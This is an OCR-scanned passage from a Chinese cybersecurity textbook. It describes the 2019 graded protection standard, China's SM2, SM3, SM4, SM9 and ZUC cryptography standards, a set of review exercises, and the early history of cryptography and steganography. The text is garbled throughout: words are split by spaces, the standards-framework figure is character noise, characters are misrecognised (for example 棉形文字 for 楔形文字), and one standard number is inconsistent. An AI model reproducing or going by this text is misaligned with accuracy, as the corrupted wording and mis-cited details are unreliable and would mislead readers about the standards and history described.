等 级 保护 对 象 由 原来 的 信息 系统 扩展 到 基础 信息 网 络 、 云 计算 平台 /系统 、 大 数据 应 
用 /平台 /资源 、 物 联网 .采用 移动 互联 技术 的 系统 .工业 控制 系统 等 。 

@ 安全 要 求 的 变化 。 

原来 是 安全 要 求 ,现在 是 安全 通用 要 求 和 安全 扩展 要 求 。 安 全 通用 要 求 是 不 管 等 级 
保护 对 象形 态 是 什么 都 必须 满足 的 要 求 ,并 且 分 别针 对 云 计算 、 移 动 互联 、 物 联网 .工业 控 
制 系统 提出 其 特殊 需求 ,为 安全 扩展 要 求 。 

@ 安全 分 类 的 变化 。 
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GB/T 22239 一 2008 中 ,技术 要 求 分 为 物理 安全 、 网 络 安全 ,主机 安全 ,应 用 安全 、 数 
据 安全 及 备份 恢复 ,管理 要 求 分 为 安全 管理 制度 、 安 全 管理 机 构 、 人 员 安 全 管理 .系统 建 设 
管理 、 系 统 运 维 管理 。 GB/T 22239—2019 中 ,技术 要 求 分 为 安全 物理 环境 、 安 全 通信 网 
络 、 安 全 区 域 边界 .安全 计算 环境 、 安 全 管理 中 心 ,管理 要 求 分 为 安全 管理 制度 、 安 全 管理 
机 构 、 安 全 管理 人 员 ,安全 建设 管理 .安全 运 维 管理 。 

@ 关于 安全 管理 中 心 。 

第 二 级 及 以 上 增加 了 “安全 管理 中 心 ”, 其 中 ,二 级 实现 “系统 管理 ”和 “审计 管理 ”, 三 
级 及 以 上 实现 “系统 管理 “审计 管理 “安全 管理 “集中 管控 ”。 

@ 关于 可 信和 验证 。 

在 第 一 级 至 第 四 级 的 “安全 通信 网络 “安全 区 域 边 界 ”“ 安 全 计算 环境 ”中 增加 了 “可 
信 验 证 ?控制 点 。 

另外 ,取消 了 原来 控制 点 的 S.A、G 标注 ,增加 附录 A 描述 等 级 保护 对 象 的 定 级 结果 
和 安全 要 求 之 间 的 关系 ,说 明 如 何 根据 定 级 结果 选择 安全 要 求 。 调 整 了 原来 附录 A 和 附 
录 B 的 顺序 ,增加 附录 C 描述 网 络 安全 等 级 保护 总 体 框架 和 关键 技术 ,增加 附录 D— H 
分 别 描述 云 计算 应 用 场景 .移动 互联 应 用 场景 物 联网 应 用 场景 工业 控制 系统 应 用 场景 
和 大 数据 应 用 场景 。 


3. 商用 密码 标准 

我 国 密码 标准 体系 研究 经 历 了 不 断 发 展 的 历程 。 最 新 的 密码 标准 体系 从 应 用 维 、 管 
理 维 和 技术 维 三 个 维度 来 刻画 。 应 用 维 是 按 标准 适用 的 不 同 应 用 领域 划分 ,比如 金融 领 
域 .交通 领域 .能 源 领域 等 。 管 理 维 是 指 国 家 标准 ,行业 标准 等 不 同 管理 属性 ,例如 密码 国 
家 标准 和 密码 行业 标准 ,前 者 是 基础 性 、 通 用 性 的 密码 标准 ,对 全 社会 各 行业 ,各 领域 的 密 
码 应 用 具有 指导 作用 ,而 后 者 则 主要 由 密码 行业 内 单位 在 密码 产品 设计 、 研 发 .检测 等 环 
节 遵 循 使 用 。 技 术 维 是 从 密码 技术 自身 的 体系 层次 出 发 ,对 密码 标准 从 技术 角度 进行 归 
类 ,从 而 形成 密码 标准 的 技术 体系 框架 ,如 图 1-12 所 示 。 


密码 标准 体系 


基础 类 标 应 用 类 标 检测 类 标 | 管理 类 标 
密 || 密 || 密 || 密 | | 密 || 行 | | 密 || 密 || 密 | “| 密 || 质 密 || 质 密 || 运 
码 || 码 || 码 || 码 码 || 业 码 || 码 || 码 码 || 量 码 || 最 码 || 维 
术 || 算 || 协 || 产 | | 服 || 密 | | 算 || 产 || 系 | “| 产 || 管 检 || 管 服 || 管 
语 || 法 || 议 || 品 | “| 务 || 码 | “| 法 || 品 || 统 | “| 品 || 理 测 | | 理 务 || 理 
室 || 及 || 于 | 于 | [£I 检 || 检 || 测 管 || 子 机 || 子 机 || 子 
码 || 使 || 类 | | 类 类 || 月 测 || 测 || 评 理 || 类 构 || 类 构 || 类 
Bm [BG [£I |£ REA | 可 
镇 || 插 || 准 || 准 | “| 准 || 类 | “| 类 || 类 || 类 | “| 类 || 准 力 || 准 力 || 准 
WA 标 LAICUS B 和 || 和 

ü 准 | “| 准 || 准 || 准 | | 准 


1-12 密码 标准 体系 框架 
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我 国 密码 标准 国际 化 工作 成 绩 喜 人 。 以 SM2,SM3,SM4,SM9,ZUC 等 密码 算法 为 
代表 的 中 国 密码 标准 经 过 多 年 努力 ,在 国际 化 推进 上 已 取得 显著 进展 , 继 2011 年 我 国 自 
主 研制 的 ZUC( 祖 冲 之 ) 密 码 算法 被 3GPP 组 织 采纳 为 新 一 代 宽 带 无 线 移动 通信 系统 
(LTE) 国 际 标准 后 ,2017 年 11 月 ,SM2 和 SM9 数字 签名 算法 正式 成 为 ISO 国际 标准 ， 
这 标志 着 我 国 向 ISO/TEC 贡献 中 国 智慧 和 中 国标 准 取得 重要 突破 ,将 进一步 促进 我 国 在 
密码 技术 和 网 络 空间 安全 领域 的 国际 合作 和 交流 。 

(1) SM 系列 密码 标准 

SM2 椭圆 曲线 公 钥 密码 算法 (简称 SM2 算法 ) 于 2010 年 12 月 首次 公开 发 布 ,2012 
年 成 为 中 国 商用 密码 标准 (标准 号 为 GM/T 0003 一 2012),2016 年 成 为 中 国 国家 密码 标 
准 ( 标 准 号 为 GB/T 32918 一 2016);2016 年 SM9 成 为 中 国 国家 密码 标准 (标准 号 为 GB/ 
T 0044—2016);2017 年 又 相继 发 布 了 有 关 SM2 的 两 个 密码 算法 标准 ;2017 年 11 月 ， 
SM2 和 SM9 数字 签名 算法 正式 成 为 ISO 国际 标准 。 有 关 标 准 如 下 ， 

(D GB/T 32918 一 2016 系列 标准 。 

* GB/T 32918.1 一 2016《 信 息 安 全 技术 SM2 椭圆 曲线 公 钥 密码 算法 第 1 部 分 : 总 

则 给 出 了 SM2 椭圆 曲线 公 钥 密码 算法 涉及 的 必要 数学 基础 知识 与 相关 密码 技 
术 , 以 帮助 实现 其 他 各 部 分 所 规定 的 密码 机 制 。 本 部 分 适用 于 基 域 为 素 域 和 二 元 
扩 域 的 椭圆 曲线 公 钥 密码 算法 的 设计 、 开 发 和 使 用 。 

* GB/T 32918.2 一 2016《 信 息 安全 技术 SM2 椭圆 曲线 公 钥 密码 算法 第 2 部 分 : 数 
字 签 名 算法 ) 规 定 了 SM2 椭圆 曲线 公 钥 密码 算法 的 数字 签名 算法 ,包括 数字 签名 
生成 算法 和 验证 算法 ,并 给 出 了 数字 签名 与 验证 示例 及 其 相应 的 流程 。 本 部 分 适 
用 于 商用 密码 应 用 中 的 数字 签名 和 验证 ,可 满足 多 种 密码 应 用 中 的 身份 鉴别 和 数 
据 完整 性 、 真 实 性 的 安全 需求 。 

* GB/T 32918.3 一 2016《 信 息 安全 技术 SM2 椭圆 曲线 公 钥 密码 算法 第 3 部 分 : 密 
钥 交 换 协 议 ) 规 定 了 SM2 椭圆 曲线 公 钥 密码 算法 的 密 钥 交换 协议 ,并 给 出 了 密 钥 
交换 与 验证 示例 及 其 相应 的 流程 。 本 部 分 适用 于 商用 密码 应 用 中 的 密 钥 交换 ,可 
满足 通信 双方 经 过 两 次 或 可 选 三 次 信息 传递 过 程 ,计算 获取 一 个 由 双方 共同 决定 
的 共享 秘密 密 钥 ( 会 话 密 钥 ) 。 

* GB/T 32918.4 一 2016《 信 息 安全 技术 SM2 椭圆 曲线 公 钥 密码 算法 第 4 部 分 : 公 
钥 加 密 算法 ) 规 定 了 SM2 椭圆 曲线 公 钥 密码 算法 的 公 钥 加 密 算法 ,并 给 出 了 消息 
加 解密 示例 和 相应 的 流程 。 本 部 分 适用 于 商用 密码 应 用 中 的 消息 加 解密 ,消息 发 
送 者 可 以 利用 接收 者 的 公 钥 对 消息 进行 加 密 , 接 收 者 用 对 应 的 私 钥 进行 解密 , 获 
取消 息 。 

* GB/T 32918.5 一 2017《 信 息 安全 技术 SM2 椭圆 曲线 公 钥 密码 算法 第 5 部 分 : S 

数 定义 ) 规 定 了 SM2 椭圆 曲线 公 钥 密码 算法 的 曲线 参数 ,并 给 出 了 数字 签名 与 验 
证 、 密 钥 交 换 与 验证 消息 加 解密 示例 。 

@ GB/T 35275 一 2017《 信 息 安全 技术 SM2 密码 算法 加 密 签名 消息 语法 规范 》 定 义 
了 使 用 SM2 密码 算法 的 加 密 签 名 消息 语法 。 本 标准 适用 于 使 用 SM2 密码 算法 进行 加 密 
和 签名 操作 时 对 操作 结果 的 标准 化 封装 。 
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@ GB/T 35276 一 2017《 信 息 安全 技术 SM2 密码 算法 使 用 规范 ) 定 义 了 SM2 密码 算 
法 的 使 用 方法 ,以 及 密 钥 、 加 密 与 签名 等 的 数据 格式 。 本 标准 适用 于 SM2 密码 算法 的 使 
用 ,以 及 支持 SM2 密码 算法 的 设备 和 系统 的 研发 和 检测 。 

@ GB/T 32905 一 2016《 信 息 安 全 技术 SM3 密码 杂凑 算法 ?规定 了 SM3 密码 杂凑 算 
法 的 计算 方法 和 计算 步骤 ,并 给 出 了 运算 示例 。 本 标准 适用 于 商用 密码 应 用 中 的 数字 签 
名 和 验证 消息 认证 码 的 生成 与 验证 以 及 随机 数 的 生成 ,可 满足 多 种 密码 应 用 的 安全 

SM3 密码 杂凑 算法 是 3 类 基础 密码 算法 之 一 , 它 可 以 将 任意 长 度 的 消息 压缩 成 固定 
长 度 的 摘要 ,主要 用 于 数字 签名 和 数据 完整 性 保护 等 。SM3 密码 杂凑 算法 的 消息 分 组 长 
度 为 512b, 输出 摘要 长 度 为 256b。 该 算法 于 2012 年 发 布 为 密码 行业 标准 (GM/T 
0004 一 2012) ,2016 年 发 布 为 国家 密码 杂凑 算法 标准 (GB/T 32905 一 2016)。 

@ GB/T 32907 一 2016《 信 息 安 全 技术 SM4 分 组 密码 算法 ) 规 定 了 SM4 分 组 密码 算 
法 的 算法 结构 和 算法 描述 ,并 给 出 了 运算 示例 。 本 标准 适用 于 商用 密码 产品 中 分 组 密码 
算法 的 实现 ,检测 和 应 用 。 

SMA 分 组 密码 算法 简称 为 SM4 算法 ,为 配合 WAPI 无 线 局 域 网 标准 的 推广 应 用 ， 
SMA 算法 于 2006 年 公开 发 布 ,2012 年 3 月 发 布 成 为 国家 密码 行业 标准 (标准 号 为 GM/T 
0002 一 2012) ,2016 年 8 月 发 布 成 为 国家 标准 (标准 号 为 GB/T 32907 一 2016) 。 

@ GM/T 0044—2016 系列 标准 。 

* GM/T 0044.1—2016(SM9 标识 密码 算法 ) 描 述 了 必要 的 数学 基础 知识 与 相关 密 
码 技术 ,以 帮助 实现 本 标准 其 他 各 部 分 所 规定 的 密码 机 制 。 本 部 分 适用 于 商用 密 
码 算法 中 标识 密码 的 实现 ,应 用 和 检测 。 本 标准 规定 使 用 Fp( 素 数 p219D Ef 
椭圆 曲线 。 

GM/T 0044.2—2016(SM9 标识 密码 算法 第 2 部 分 : 数字 签名 算法 ) 规 定 了 用 椭 

圆 曲线 对 实现 的 基于 标识 的 数字 签名 算法 .包括 数字 签名 生成 算法 和 验证 算法 ， 

并 给 出 了 数字 签名 与 验证 算法 及 其 相应 的 流程 。 本 部 分 适用 于 接收 者 通过 签名 

者 的 标识 验证 数据 的 完整 性 和 数据 发 送 者 的 身份 ,也 适用 于 第 三 方 确定 签名 及 所 

签 数 据 的 真实 性 。 

* GM/T 0044.3—2016(SM9 标识 密码 算法 第 3 部 分 : 密 钥 交 换 协议 ?规定 了 用 椭 
圆 曲 线 对 实现 的 基于 标识 的 密 钥 交换 协议 ,并 提供 了 相应 的 流程 。 该 协议 可 以 使 
通信 双方 通过 对 方 的 标识 和 自身 的 私 钥 经 两 次 或 可 选 三 次 信息 传递 过 程 ,计算 获 
取 一 个 由 双方 共同 决定 的 共享 秘密 密 钥 。 该 秘密 密 钥 可 作为 对 称 密码 算法 的 会 
话 密 钥 ,协议 中 选项 可 以 实现 密 钥 确认 。 本 部 分 适用 于 密 钥 管 理 与 协商 。 

* GM/T 0044.1—2016(SM9 标识 密码 算法 第 4 部 分 : 密 钥 封装 机 制 和 公 钥 加 密 算 
法 ) 规 定 了 用 椭圆 曲线 对 实现 的 基于 标识 的 密 钥 封装 机 制 和 公 钥 加 密 与 解密 算 
法 ,并 提供 相应 的 流程 。 利 用 密 钥 封 装机 制 可 以 封装 密 钥 给 特定 的 实体 。 公 钥 加 
密 与 解密 算法 即 基于 标识 的 非 对 称 密码 算法 ,该 算法 使 消息 发 送 者 可 以 利用 接收 
者 的 标识 对 消息 进行 加 密 , 唯 有 接收 者 可 以 用 相应 的 私 钥 对 该 密 文 进行 解密 ,从 
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而 获取 消息 。 本 部 分 适用 于 密 钥 封 装 和 对 消息 的 加 解密 。 

* GM/T 0044.5—2016(SM9 标识 密码 算法 第 5 部 分 : 参数 定义 ) 规 定 了 SM9 标识 
密码 算法 的 曲线 参数 ,并 给 出 了 数字 签名 算法 、 密 钥 交 换 协 议 、 密 钥 封 装机 制 、 公 
钥 加 密 算法 示例 。 

(2) 祖冲之 密码 标准 

祖冲之 算法 简称 ZUC, 是 一 个 面向 字 设 计 的 序列 密码 算法 ,其 在 128b 种 子 密 钥 和 
128b 初始 向 量 控制 下 输出 32b 的 密 钥 字 流 ,祖冲之 算法 于 2011 年 9 月 被 3GPP LTE 
纳 为 国际 加 密 标 准 ( 标 准 号 为 TS 35. 221 , 即 第 4 代 移 动 通信 加 密 标准 ,2012 年 3 月 被 发 
布 为 国家 密码 行业 标准 (标准 号 为 GM/T 0001 一 2012) ,2016 年 10 月 被 发 布 为 国家 标准 
(标准 号 为 GB/T 33133 一 2016) 。 

GB/T 33133.1 一 2016《 信 息 安 全 技术 祖冲之 序列 密码 算法 第 1 部 分 : 算法 描述 ) 给 
出 了 祖冲之 序列 密码 算法 的 一 般 结构 ,基于 该 结构 可 实现 本 标准 其 他 各 部 分 所 规定 的 密 
码 机 制 。 本 部 分 适用 于 祖冲之 序列 密码 算法 相关 产品 的 研制 .检测 和 使 用 ,可 应 用 于 涉及 
非 国家 秘密 范畴 的 商业 应 用 领域 。 

ZUC 算法 是 中 国 自主 设计 的 流 密码 算法 , 是 中 国 第 一 个 成 为 国际 密码 标准 的 密码 
算法 ,其 标准 化 的 成 功 是 中 国 在 商用 密码 算法 领域 取得 的 一 次 重大 突破 ,体现 了 中 国 商用 
密码 应 用 的 开放 性 和 商用 密码 设计 的 高 能 力 , 必 将 增 大 中 国 在 国际 通信 安全 应 用 领域 的 
影响 力 。 


15 习题 


. 根据 自己 的 切身 体会 ,阐述 我 国 社会 信息 化 的 发 展 。 
. 写 一 个 小 型 调查 报告 ,用 实例 说 明确 保 信 息 安全 的 重要 性 。 
. 什么 是 网 络 空间 ? 为 什么 网 络 空间 存在 严峻 的 信息 安全 问题 ? 
. 信息 安全 的 三 大 定律 是 什么 ”对 我 们 的 学 习 和 工作 有 什么 作用 ? 
. 什么 是 网 络 空间 安全 学 科 ? 学 科 与 专业 有 什么 区 别 ? 
. 网 络 空间 安全 学 科 的 主要 研究 方向 及 内 容 是 什么 ? 
. 网 络 空间 安全 学 科 的 理论 基础 是 什么 ?这些 理论 基础 对 我 们 的 专业 学 习 和 研究 
工作 有 什么 指导 意义 ? 
8. 网 络 空间 安全 学 科 的 方法 论 是 什么 ? 在 运用 这 一 方法 论 分 析 和 解决 问题 时 ,应 当 
注意 什么 ? 
9. 信息 安全 法 律 法 规 有 几 大 类 别 ? 请 举例 说 明 。 
10.《 中 华人 民 共 和 国 网 络 安全 法 ) 哪 一 年 开始 实施 ? 它 的 实施 具有 什么 意义 ? 
11.《 中 华人 民 共 和 国 密码 法 ) 哪 一 年 开始 实施 ? 
12.《 中 华人 民 共 和 国 刑法 ) 第 二 百 八 十 五 至 二 百 八 十 七 条 的 内 容 是 什么 ? 
13. 互联 网 安全 的 刑事 责任 具体 条 款 有 哪些 ? 


中 性 
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14. 全 国信 息 安 全 标准 化 技术 委员 会 的 组 织 架 构 是 怎样 的 ? 

15. 国际 上 专门 从 事 信息 安全 通用 方法 及 技术 标准 化 工作 的 组 织 是 什么 ? 
16. 信息 安全 标准 化 工作 的 意义 是 什么 ? 

17.《 信 息 安 全 等 级 保护 基本 要 求 ) 的 主要 内 容 是 什么 ? 有 什么 意义 ? 

18. 举例 说 明 中 国 商用 密码 标准 有 哪些 。 

19. 简 述 信息 安全 分 级 保护 和 信息 安全 等 级 保护 。 
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2.1.1 密码 的 起 源 


日 益 发 展 , 人 们 开发 出 属于 自己 的 各 种 复杂 的 系统 一 语言 系统 .数字 系统 和 文字 系统 。 
这 些 系统 展现 了 古人 类 表达 抽象 思维 过 程 \ 有 条 理 地 组 织 劳 作 和 创造 象征 符号 的 能 力 , 并 
创造 出 人 类 最 初 的 密码 。 为 了 揭示 这 些 古 老 的 系统 是 如 何 发 展演 变 并 具备 何 种 功能 , 考 
古 学 家 们 不 得 不 采用 密码 分 析 技 术 来 研究 那些 支离破碎 的 实物 证 据 。 

对 于 古人 类 而 言 , 能 否 在 严酷 的 环境 下 生存 下 去 ,主要 取决 于 人 们 对 主宰 世界 的 自然 
规律 的 感知 和 理解 能 力 。 不 同形 态 的 云 隐藏 着 不 同 的 信息 ,远古 人 类 通过 观察 云 的 特征 
来 解密 天 气 信息 ,理解 并 掌握 不 同形 态 的 云 所 蕴含 的 含义 ,以 预测 当时 的 天 气 , 判 断 是 否 
会 刊 风 或 下 雨 。 狩 猎 是 人 类 学 习 “ 解 密 " 信 息 的 最 早 的 实践 之 一 ,人 类 和 狩猎 的 天 赋 可 以 追 
溯 到 十 万 年 前 甚至 更 久 。 猎 人 在 狩猎 的 过 程 中 ,会 根据 猎物 遗留 的 足 印 、 活 动 痕迹 、 哨 食 
的 草木 等 迹象 ,解读 其 中 隐藏 的 信息 ,以 判断 猎物 的 种 类 、 踪 迹 和 活动 规律 等 ,如 图 2-1 所 
示 。 在 语言 及 文字 诞生 之 前 ,古人 类 通过 手势 .肢体 语言 及 丛林 符号 向 同族 或 其 他 部 落 的 
狩猎 者 发 出 信号 和 指令 ,以 协调 狩猎 行动 。 这 可 以 看 作 古 人 类 采用 的 一 种 原始 的 秘密 信 
息 传递 和 解读 方式 。 


Li NE 
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1. 古代 岩画 

在 远古 时 代 就 出 现 了 岩画 艺术 ,这 些 岩 画 形式 多 样 , 呈 现 了 当时 人 类 的 活动 场景 。 这 
些 岩 画 不 以 精确 地 刻画 人 类 或 动物 外 形 为 目的 ,而 是 将 一 些 象征 性 图 案 以 某 种 方式 排列 
组 合 来 传达 不 同 的 信息 ,这 是 人 类 通过 图 形 化 符号 来 传递 信息 的 最 早 手段 之 一 。1940 
年 ,法国 西南 部 道 尔 多 尼 州 乡村 的 4 个 少年 , 带 着 一 条 狗 在 追 提 野兔 的 过 程 中 ,无 意 中 发 
现 了 一 个 巨大 的 史前 艺术 殿堂 ,里 面 有 17 000 年 前 人 类 留 下 的 大 量 洞窟 岩画 ,这 就 是 后 
来 被 称 为 “史前 卢 浮 宫 ”的 拉 斯 科 洞 写 岩 画 。 法 国 拉 斯 科 洞 写 岩 画 描 绘 了 大 量 的 狩猎 场 
面 ,也 包含 了 很 多 象征 符号 。 拉 斯 科 洞 写 岩 画 中 最 令 人 瞩目 的 是 所 谓 的 “中 国 马 ”, 因 其 形 
体 颇 似 中 国 的 蒙古 马 种 而 得 名 。 画 中 的 马 正 处 于 怀孕 期 , 它 表达 了 人 们 祈求 繁殖 的 愿望 。 
图 2-2 为 法 国 拉 斯 科 洞 富 中 的 部 分 岩画 。 


图 2-2 法 国 拉 斯 科 洞窟 岩画 


挪威 的 阿尔 塔 岩 画 形成 于 公元 前 4200 年 至 公元 前 500 年 , 它 分 布 在 5000m 长 的 临 
海 斜 坡 上 。 这 些 图 画 内 容 十 分 丰富 ,有 人 物 ,动物 .几何 图 形 等 ,还 有 许多 狩猎 的 场面 。 这 
些 图 画 都 有 一 定 的 象征 意义 ,例如 , 鱼 象征 渔业 发 达 , 人 的 形象 则 被 认为 是 消灭 敌人 的 吕 
符 。 图 2-3 为 挪威 阿尔 塔 岩画 。 


在 我 国 宁夏 银川 也 有 贺兰山 岩画 , 约 有 千 余 幅 个 体 图 形 的 岩画 分 布 在 沟谷 两 侧 绵延 
600 多 米 的 山 岩 石壁 上 。 根 据 岩 画图 形 和 西夏 刻 记 分 析 , 贺 兰 山 岩画 是 不 同时 期 先后 刻 
制 的 ,大 部 分 是 春秋 战国 时 期 的 北方 游牧 民族 所 为 ,也 有 其 他 朝代 和 西夏 时 期 的 画像 , 距 
今 有 3000 一 10000 年 的 历史 。 画 面 艺术 造型 粗 久 浑厚 ,构图 朴实 ,姿态 自然 ,写实 性 较 强 。 
以 人 首 像 为 主 的 占 总 数 的 一 半 以 上 ,其 次 为 牛 、 马 、 驴 、 鹿 、 鸟 , 狼 等 动物 图 形 。 这 些 岩 画 揭 
示 了 原始 氏族 部 落 自然 崇拜 ,生殖 崇拜 图腾 崇拜 .祖先 崇拜 的 文化 内 涵 , 是 研究 中 国人 类 
文化 史 、 宗 教 史 、 原 始 艺术 史 的 文化 宝库 。 图 2-4 为 中 国 宁夏 贺兰山 岩画 。 

正 是 因为 古人 们 将 当时 人 类 的 生活 和 劳动 信息 隐藏 于 岩画 之 中 ,我 们 今天 才 有 可 能 
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通过 解读 这 些 信 息 ,还 原 远 古 时 代 人 类 所 处 的 生活 环境 和 一 系列 生活 场景 ,这 是 不 是 可 以 
看 作 是 古人 采用 的 某 种 信息 隐藏 方式 呢 ? 而 现代 人 们 对 这 些 岩 画 的 解读 ,是 不 是 也 可 以 
看 作 一 种 对 岩画 所 隐藏 的 信息 进行 的 解密 呢 ? 


2. 古文 字 的 形成 

大 约 在 5500 年 前 ,在 早期 的 农业 和 商业 活动 中 ,人 们 需要 记录 所 存储 和 交易 的 物资 、 
生活 用 品 和 交易 内 容 。 在 这 种 背景 下 ,人 们 发 明了 最 早 用 来 对 信息 进行 编码 的 书写 系统 。 
约 公元 前 3400 年 ,在 美 索 不 达 米 亚 地 区 的 苏 美 尔 , 古 人 发 明了 使 用 雕刻 符号 来 计数 的 泥 
币 。 在 经 历数 千年 之 后 ,一 种 基于 不 同 语言 的 数字 和 文字 系统 慢 慢 传播 到 整个 西亚 地 区 。 
与 此 同时 ,在 南非 ,中 国 和 美洲 中 部 等 地 区 ,也 各 自 形 成 了 自己 的 文字 系统 。 这 些 成 就 彰 
显 了 人 类 的 巨大 进步 。 人 类 越 来 越 精通 于 计数 和 书写 等 抽象 思维 ,并 在 此 基础 上 促进 了 
立法 、 测 重 、 造 币 、 数 学 、 几 何 和 代数 等 知识 的 发 展 ,人 类 的 发 展 史 便 得 以 记载 。 

棉 形 文字 是 由 古 苏 美 尔 人 所 创 ,属于 象形 文字 ,如 图 2-5 Bras; EF BUE CHE BU Hi 
述 ,最 早 来 自 于 一 位 西班牙 的 外 交 官 加 西亚 . 席 瓦 尔 。 菲 格 罗 亚 。 他 于 1618 年 在 波斯 波 
利 斯 看 到 了 用 模 形 文字 书写 的 碑文 ,并 将 这 种 棉 形 文字 描述 成 “三 角形 的 , 形 如 微缩 的 金 
字 塔 *"。 尽 管 牛津 大 学 的 语言 学 家 托马斯 ， 海德 对 这 种 文字 进行 了 推广 ,但 他 并 不 相信 这 
些 图 案 是 文字 ,认为 它们 只 不 过 是 建筑 物 的 装饰 而 已 。 


2-5 古代 波斯 发 现 的 攀 形 文字 


在 1802 年 ,打开 槐 形 文字 之 谜 的 钥匙 被 一 位 德国 文字 学 家 格 奥 尔格 。 弗 里 德里 和希 

格 罗 特 芬 德 发 现 。 希 格 罗 特 芬 德 在 一 位 来 自 希腊 的 语言 学 家 的 帮助 下 ,破译 了 棉 形 文字 。 

他 的 破译 方法 更 像 是 密码 分 析 学 ,而 非 语言 学 。 希 格 罗 特 芬 德 的 伟大 成 就 在 于 他 成 功 破 
译 了 一 门 失传 已 久 的 古老 语言 ,将 人 类 有 文字 记载 的 历史 提前 了 3000 年 。 

大 约 在 3 万 年 前 ,猎人 开始 使 用 木 棍 或 骨头 来 记录 猎物 数量 。 人 类 在 记录 事物 的 过 

程 中 ,创建 了 计数 系统 。 从 棉 形 文字 中 的 数字 符号 ,到 罗马 数字 符号 ,再 到 阿拉 伯 数 字 , 世 
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界 大 部 分 地 区 的 数字 系统 经 历 了 漫长 的 演变 过 程 。 这 个 数字 演变 的 过 程 ,其 实 是 长 期 以 
来 人 们 对 古代 世界 存在 的 难以 辨识 的 各 种 计数 方式 的 解读 过 程 ,最 终 形成 了 当今 世界 广 
泛 采 用 的 “阿拉 伯 数 字 ”。 

斐 斯 托 斯 圆 盘 (Phaistos Disc) T. 1908 年 在 希腊 克 里 特 岛 的 韭 斯 托 斯 皇宫 遗址 被 发 
现 , 现 存 于 希腊 的 伊拉克 里 俩 考古 博物 馆 , 如 图 2-6 所 示 。 圆 盘 上 的 符号 是 用 活字 印 模 在 
泥 盘 尚 湿 时 压 印 上 去 的 ,因此 斐 斯 托 斯 圆 盘 也 被 认为 是 迄今 所 知 最 早 的 活字 印刷 文献 。 
圆 盘 的 正 反 两 面 共 刻 有 241 个 象形 符号 ,这 些 符 号 在 圆 盘 的 两 面 都 以 顺 时 针 方向 由 外 向 
内 螺旋 排 布 , 表 示 了 人 物 动物 ,植物 .工具 等 45 种 不 同 的 事物 。 虽 然 近 来 有 学 者 认为 它 
上 面 记载 的 是 某 种 古代 天 文 历 法 ,但 至 今 还 没有 任何 学 者 能 解密 这 些 文字 图 案 的 意义 。 


图 2-6 斐 斯 托 斯 圆 盘 正 反面 图 案 


3. 古代 隐 写 术 

消息 隐藏 的 应 用 (尤其 是 在 战争 或 国家 安全 中 的 应 用 ) ,可 以 追溯 到 好 几 个 世纪 以 前 。 
早 在 字母 表 和 数字 编码 发 明之 前 ,人 们 就 开发 出 很 多 精妙 的 技巧 来 隐藏 消息 ,其 中 一 些 方 
法 至 今 仍 在 使 用 。 这 些 方法 尽管 不 是 非常 严格 的 加 密 过 程 ,但 是 其 主旨 与 密码 学 的 目标 
是 相同 的 ,而 如 今 我 们 称 这 种 技术 为 “ 隐 写 术 ”。 

大 约 在 公元 前 499 4E ,希腊 贵族 希 斯 提 亚 埃 乌 斯 为 了 安全 地 把 机 密 信息 传送 给 米利 
都 的 阿里 斯 塔 格 鲁 斯 ,优生 他 起 兵 反 叛 波斯 人 , 想 出 一 个 绝妙 的 主意 : 剃 光 传 信 奴 隶 的 头 
发 ,在 其 头顶 上 写 下 密 信和 ,等 头发 重新 长 出 来 ,再 将 他 派 往 米利 都 送信 。 信 使 携带 了 密 信 ， 
但 他 却 不 知道 密 信 的 内 容 。 等 他 到 达 目 的 地 ,对 方 只 要 剃 光 信 使 的 头发 ,就 可 以 获得 密 信 
的 内 容 。 

古人 也 采用 蜡 封 技术 隐藏 信息 。 大 约 在 公元 前 480 年 ,一 个 因 被 流放 而 居住 在 波斯 
的 希腊 人 ,发 现 波 斯 国王 薛 西 斯 欲 派 强 大 的 军队 进攻 希腊 , 想 给 自己 的 祖国 发 送 和 警报。 他 
设法 找到 一 对 表面 封 螨 的 书写 板 , 将 表面 的 螨 费 力 刮 掉 , 将 报警 消息 写 在 木板 上 ,并 重新 
用 蜡 封 上 。 和 希腊 人 在 获得 这 对 书写 板 后 , 猜 出 消息 被 隐藏 在 蜡 层 之 下 , 便 刊 掉 螨 封 ,获得 
了 报警 消息 ,提前 为 应 对 波斯 王国 的 攻击 做 好 了 战争 准备 。 
隐藏 信息 的 另 一 种 方法 就 是 使 用 隐 写 墨水 。 早 在 公元 1 世纪 ,智慧 的 古 罗 马 人 就 利 
用 大 戟 科 植物 汁液 风干 后 透明 .加热 后 变 棕色 的 特性 ,提取 大 戟 科 植 物 的 汁液 ,发 明了 隐 
显 墨 水 。 此 外 ,人 们 也 发 现 洋 萄 .柠檬 汁 等 也 可 以 用 于 制作 隐形 墨水 。 


4. 古代 战争 密码 

外 交 和 战争 是 最 早 使 用 编码 和 密码 的 两 个 重要 领域 。 人 们 传说 编码 和 密码 的 应 用 起 
源 于 古 和 希腊 。 考 虑 到 希腊 人 对 文字 和 数字 的 迷恋 ,这 种 说 法 也 不 足 为 奇 。 

我 们 所 熟知 的 最 古老 的 密码 装置 就 是 密码 棒 ,图 2-7 为 斯 巴 达 密 码 棒 。 早 在 公元 前 7 
世纪 ,密码 棒 在 古 希 腊 的 军事 重镇 斯 巴 达 就 得 到 广泛 使 用 。 密 码 棒 就 是 一 根木 棒 ,信息 的 
发 送 者 会 用 羊皮 纸 或 皮带 一 圈 接 一 圈 地 缠绕 在 木 棒 上 ,然后 发 信者 沿 着 木 棒 的 长 边 逐 行 
写 下 完整 的 信息 。 解 开 缠绕 在 木 棒 上 写 满 信息 的 带子 后 ,会 得 到 一 个 看 上 去 上 毫 无 意义 的 
字母 带 。 这 条 字母 带 随后 会 被 秘密 地 传送 给 接收 者 。 如 果 信 息 被 写 在 皮带 上 ,信使 可 以 
将 此 皮带 反 过 来 扎 在 腰 上 ,以 便 隐 藏 皮带 上 的 信息 。 此 后 ,接收 者 将 皮带 再 次 缠绕 在 自己 
的 密码 棒 上 (假设 此 密码 棒 与 发 送 者 的 密码 棒 具 有 相同 的 直径 和 面 数 ) ,就 可 以 读 出 被 隐 
藏 的 信息 。 


图 2-7 斯 巴 达 密 码 棒 


5. 达 ， 芬 奇 密码 简 

由 同名 小 说 改编 的 电影 ( 达 ， 芬 奇 密码 》 中 出 现 的 密码 简 , 是 根据 达 。 芬 奇 手稿 复制 
出 来 的 ,如 图 2-8 所 示 。 此 密码 简 造 型 古典 ,设计 优雅 ,内 含 文艺 复兴 特质 ,符合 达 ， 芬 奇 
的 窒 智 风格 。 在 《4 达 ，。 芬 奇 密码 ) 小 说 中 也 有 提 到 这 种 密码 简 。 按 照 故 事情 节 , 密 码 简 里 
